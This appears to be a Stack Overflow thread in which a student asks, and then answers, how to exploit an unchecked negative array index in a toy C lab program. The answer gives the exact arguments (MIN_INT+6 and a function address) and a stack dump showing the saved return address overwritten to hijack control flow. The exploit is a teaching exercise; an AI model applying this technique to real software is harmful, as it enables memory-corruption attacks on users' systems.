-2

I have this code, which have some vulnerability, but I can't seem to exploit it.

For now, this is what I've noticed:

1) if argv[1] = 3 and argc = 3, then it overflows and writes argv[2] into memory of array[3] in "place_int_array" function.

2) if argv[1] < 0 and argc = 3, then it argv[2] overrides memory at array[argv[1]].

3) we write argv[0] in printf function, which can be exploited somehow (didnt manage to exploit it at all).

Here is the code. I've put some comments, hopefully it's readable.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int secretCode = 123;

void print_secret_code(){
    //TODO - call this from somewhere...
    printf("You get better at this stuff, ah?! Go get your treasure, the code is %d\n", secretCode);
}

                //  array,         3
void  fill_array(int array[], size_t len){
  unsigned int i;
  for (i = 0; i < len; i++){
    array[i] = i * 10;
    printf("array[i]: %d, i: %d\n", array[i], i);
  }
}

void place_int_array(int slot,int value){

  //buffer size = 3*4=12 bytes?
  int array[3];

  //sizeof(array)=4*SAFES ( = 12 here), sizeof(array[0]) = 4 ==> fill_array(array, 12/4=3)
  fill_array(array, sizeof(array)/sizeof(array[0]));

  //vuln - when slot = 3.
  if(slot>3) //we stop bad guys here
    printf("safe number is greater than 3, out of bounds.\n");
  else{
    //vuln?
    array[slot]=value; 
    printf("filled safe %d with %d.\n",slot,value);
  }
  return;
}

int main(int argc,char **argv){
  if(argc!=3){
    printf("Welcome to Alladin's magic cave!\n");
    printf("Enter the secret number into the right safe and get the treasure cave entrance code!\n");
    printf("syntax: %s [SAFE NUMBER] [SECRET NUMBER]\n",argv[0]);

    //TEMP TEMP - for debugging only
    printf("print_secret_code function = %p\n", print_secret_code);
  }
  else
                  //atoi("14s56")=>14, atoi("a14s56")=>0
    place_int_array(atoi(argv[1]), atoi(argv[2]));

  exit(0);
}

I expect to somehow manage to control the flow of the program to execute the "print_secret_code". I know how to find its address, just can't find a way to exploit the program such that it goes to that memory.

NOTE: I know how to debug and make it print the value of the variable. I'm asking how can I exploit the code itself to jump into that function.

Elyasaf755
  • 2,239
  • 18
  • 24
  • looks like a stack smashing vuln to me, for this negative numbers are needed in argv2. perhaps try the address of print_secret_code in argv3 – Jasen May 05 '19 at 20:03
  • yea, it is an integer overflow apearently. I've tried passing arguments to argv[1] and argv[2] that are greater than max size, and printed them out, but they wont overflow for somereason. same for values less than minimum value of int – Elyasaf755 May 06 '19 at 14:37
  • try values around -2^63 or -2^31 – Jasen May 06 '19 at 18:47
  • well, I've noticed that the return address of place_int_array function in the stack is just 6 bytes away from the address of array in the stack (6 bytes above). so i've managed to override some addresses of the stack, but because the stack is in different addresses everytime, i cant really calculate how negative argv[1] should be (it is somewhere around -2^31 though) such that it overrides the address of array[6] exactly. – Elyasaf755 May 07 '19 at 08:26
  • You have access to the source code so there is no point in exploiting anything. The number is 123. – Lundin May 07 '19 at 11:59
  • @Lundin I put that number in there, originally the code was like this: int secretCode = ###SAFE###; there is no way to know the actual number without exploiting the real program. – Elyasaf755 May 11 '19 at 20:28
  • @Elyasaf755 My point is, this is artificial with no relevance to the real world. You have the source code and you can't use this "exploit" unless you have it. And since you have the source, simply read it to find out the number. – Lundin May 13 '19 at 06:38

1 Answers1

1

I've managed to solve this problem, but I dont understand something. Here it is:

Since it's an integer overflow problem, I've wrote some code to print out the buffer. The beginning of the buffer is the address where array[0] is stored. Then, I started to pass MAX_INT and MIN_INT values to the program. I've noticed that when I passed MIN_INT value to argv[1], it overwrote the begining of the buffer. so I passed MIN_INT+1 value, and noticed that it overwrote the second address of the buffer. from there it was easy to solve. I've found out that the saved eip is at the address of array[6], so I passed to argv[1] the decimal value of MIN_INT+6, and to argv[2] I've passed the address of "print_secret_code" function in decimal.

here is the output:

[lab8_IntegerOverflow]$ ./aladdinSafe -2147483642 134514251 //run program and pass arguments
print_secret_code function = 0x804864b
place_int_array ret address: 0x80487fa
&array: 0xff9cb9c4
slot: -2147483642
&array[slot]: 0xff9cb9dc
Stack dump (stack at 0xff9cb9c4, len 30): 
0xff9cba38: 0xdbc70467
0xff9cba34: 0x5bc66076
0xff9cba30: 0x00000000
0xff9cba2c: 0x00000000
0xff9cba28: 0x00000000
0xff9cba24: 0xf775d000
0xff9cba20: 0x0804825c
0xff9cba1c: 0x0804a01c
0xff9cba18: 0xff9cba34
0xff9cba14: 0xff9cba94
0xff9cba10: 0x00000003
0xff9cba0c: 0xf7786cca
0xff9cba08: 0xff9cbaa4
0xff9cba04: 0xff9cba94
0xff9cba00: 0x00000003 (main first argument (argc))
0xff9cb9fc: 0xf75cbaf3 (main return address (saved eip))
0xff9cb9f8: 0x00000000
0xff9cb9f4: 0xf775d000
0xff9cb9f0: 0x08048810
0xff9cb9ec: 0xf775d000
0xff9cb9e8: 0x0804881b
0xff9cb9e4: 0x0804864b (second argument)
0xff9cb9e0: 0x80000006 (first argument)
0xff9cb9dc: 0x0804864b (place_int_array return address (saved eip))
0xff9cb9d8: 0xff9cb9f8 (saved ebp)
0xff9cb9d4: 0xf7799938
0xff9cb9d0: 0xff9cc5c3
0xff9cb9cc: 0x00000014 //address of array[2]
0xff9cb9c8: 0x0000000a //address of array[1]
0xff9cb9c4: 0x00000000 (beginning of buffer)//address of array[0]
filled safe -2147483642 with 134514251.
You get better at this stuff, ah?! Go get your treasure, the code is 10
Segmentation fault

You can see detailed answer here: Different Int values for the same value?

which is a new topic of a new question I have about the solution.

thanks a lot for all the helpers!

Elyasaf755
  • 2,239
  • 18
  • 24